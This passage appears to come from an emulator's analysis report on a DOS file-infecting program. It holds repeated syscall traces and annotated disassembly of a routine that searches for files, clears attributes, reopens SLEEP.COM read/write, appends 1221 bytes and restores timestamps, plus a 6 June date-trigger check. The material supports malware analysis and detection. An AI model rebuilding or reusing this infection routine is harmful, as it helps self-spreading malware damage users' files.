0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave via 0x12c52
; (outside this window).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at ES:[DX + 0x62], then move it into BX for the
; calls that follow.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.875055355Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.893100024Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.894703951Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.906216996Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.910549786Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.912092044Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.914031699Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.916148866Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.925225027Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.926817582Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.934685113Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.944431886Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.947017096Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.956414626Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.962789217Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.964885051Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.976386844Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.978274867Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.984852716Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.988036742Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.990790512Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.993584219Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.996494843Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.005910576Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.007309967Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.015118174Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.02530191Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:30.027948462Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.034880407Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.041549535Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.043579158Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.054949203Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.057063428Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.063841312Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.067099735Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.070639546Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.073440224Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.075566821Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.090876647Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.092481762Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.100017228Z 67 PC: 12d4a | Get or set file attributes (See above)
; Disassembly window the emulator printed with the "Get date" row: 20
; instructions decoded linearly from the logged PC 0x12b60. Only the first
; four are certainly code on this path; the decode then runs on through the
; bytes that sit behind an unconditional jmp.
; INT 21h/AH=2Ah returns DH = month and DL = day, so the compare in the row
; below tests for 6 June (0x0606): a date-trigger check.
; NOTE(review): the JSON record printed with each run lists Day 1 / Month 1;
; if that is the emulated clock, the compare fails and this run never
; exercises the 0x12d4f branch - confirm before treating the trace as complete.
2018-12-25T12:03:30.110656677Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
; Any other date: continue at 0x12dba. The next trace rows (PC 12dc5, 12dcd)
; lie just past that address.
0x12b66: jmp 0x12dba
; Date matched: 0x12d4f is outside this window, so what runs on the trigger
; date cannot be read from here.
0x12b69: jmp 0x12d4f
; Nothing visible branches to 0x12b6c and it follows an unconditional jmp, so
; the next lines are probably data decoded as instructions - TODO confirm.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
; NOTE(review): the next two lines would encode as 00 55 8B EC (reconstructed
; from the mnemonics). Decoded from 0x12b75 instead, 55 / 8B EC is
; push bp / mov bp, sp, which fits the sub sp, 0x2c and [bp - 0x2c] below.
; The decode is likely misaligned here and a routine likely starts at
; 0x12b75 - verify against the raw bytes.
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2C bytes of stack.
0x12b78: sub sp, 0x2c
0x12b7b: push si
; Forward jump to 0x12bed, outside this window; the lines below are not
; reached by fall-through.
0x12b7c: jmp 0x12bed
; INT 21h/AH=1Ah: set the disk transfer address to the 0x2C-byte stack buffer.
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; INT 21h/AH=4Eh: find first; attribute mask 0x10 includes directory entries.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
; DS:DX = 0x1AA + word at DS:0x106 (search pattern; its text is not shown).
; The same word is added to 0x115 in the "Get time" window, so it looks like
; a load-base value - assumption.
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:30.113104356Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:30.11732729Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:30.268026764Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:30.272010057Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:30.275830218Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:30.277177734Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:30.283444944Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:30.290260567Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window the emulator printed with the "Get time" row: 20
; instructions from the logged PC 0x12cae, where execution resumes after the
; call. INT 21h function numbers below are read from the AH/AX values loaded
; here; they match the "Syscall Op" column of the rows that follow
; (67 = 43h, 62 = 3Eh, 61 = 3Dh).
; Detection-relevant sequence: attributes are cleared, the file is closed and
; reopened read/write, and the trace then logs the writes.
; INT 21h/AH=2Ch returns DH = seconds and DL = hundredths; the row below sums
; them into DL.
2018-12-25T12:03:30.296531357Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Sum was zero: branch back to 0x12caa, 4 bytes before this window
; (presumably the call is repeated until the byte is non-zero).
0x12cb0: je 0x12caa
; SI = 0x115 + word at DS:0x106. The same word is added to 0x1AA in the
; "Get date" window, so it looks like a load-base value - assumption.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
; Store the time-derived byte in the program's own data. Its use is not
; visible here (a per-copy key or marker would fit - TODO confirm).
0x12cb9: mov byte ptr [si], dl
; INT 21h/AX=4301h: set file attributes; CX = 0 clears every attribute bit,
; including read-only. DS:DX = SI + 0xBC is the path argument.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h/AH=3Eh: close; the handle in BX was set before this window.
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h/AX=3D02h: open with access mode 2 (read/write). DX is not reloaded,
; so the same path is used.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave via 0x12c52
; (outside this window).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at ES:[DX + 0x62], then move it into BX for the
; calls that follow.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:30.298814282Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:30.320127203Z 62 PC: 12ccc | Close file
2018-12-25T12:03:30.32250852Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:30.328832532Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:30.335883655Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:30.338634628Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:30.341349598Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:30.344379307Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:30.476288654Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:30.477823943Z 62 PC: 12d37 | Close file
2018-12-25T12:03:30.523303268Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:30.53327984Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:30.53613141Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.544072026Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.551088416Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.553432202Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.565369698Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.567439323Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.574058828Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.577196124Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.580681531Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.58348376Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.585479472Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.595446047Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.597085287Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.615612824Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.632092374Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:30.6349297Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.64163199Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.649071855Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.651565556Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.667577Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.670338855Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.677382114Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.680419693Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.68332338Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.686954162Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.688750844Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.697678473Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.700264172Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.708956007Z 67 PC: 12d4a | Get or set file attributes (See above)
; Disassembly window the emulator printed with the "Get date" row: 20
; instructions decoded linearly from the logged PC 0x12b60. Only the first
; four are certainly code on this path; the decode then runs on through the
; bytes that sit behind an unconditional jmp.
; INT 21h/AH=2Ah returns DH = month and DL = day, so the compare in the row
; below tests for 6 June (0x0606): a date-trigger check.
; NOTE(review): the JSON record printed with each run lists Day 1 / Month 1;
; if that is the emulated clock, the compare fails and this run never
; exercises the 0x12d4f branch - confirm before treating the trace as complete.
2018-12-25T12:03:30.71887306Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
; Any other date: continue at 0x12dba. The next trace rows (PC 12dc5, 12dcd)
; lie just past that address.
0x12b66: jmp 0x12dba
; Date matched: 0x12d4f is outside this window, so what runs on the trigger
; date cannot be read from here.
0x12b69: jmp 0x12d4f
; Nothing visible branches to 0x12b6c and it follows an unconditional jmp, so
; the next lines are probably data decoded as instructions - TODO confirm.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
; NOTE(review): the next two lines would encode as 00 55 8B EC (reconstructed
; from the mnemonics). Decoded from 0x12b75 instead, 55 / 8B EC is
; push bp / mov bp, sp, which fits the sub sp, 0x2c and [bp - 0x2c] below.
; The decode is likely misaligned here and a routine likely starts at
; 0x12b75 - verify against the raw bytes.
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2C bytes of stack.
0x12b78: sub sp, 0x2c
0x12b7b: push si
; Forward jump to 0x12bed, outside this window; the lines below are not
; reached by fall-through.
0x12b7c: jmp 0x12bed
; INT 21h/AH=1Ah: set the disk transfer address to the 0x2C-byte stack buffer.
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; INT 21h/AH=4Eh: find first; attribute mask 0x10 includes directory entries.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
; DS:DX = 0x1AA + word at DS:0x106 (search pattern; its text is not shown).
; The same word is added to 0x115 in the "Get time" window, so it looks like
; a load-base value - assumption.
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:30.722229547Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:30.726489327Z 59 PC: 12dcd | Change current directory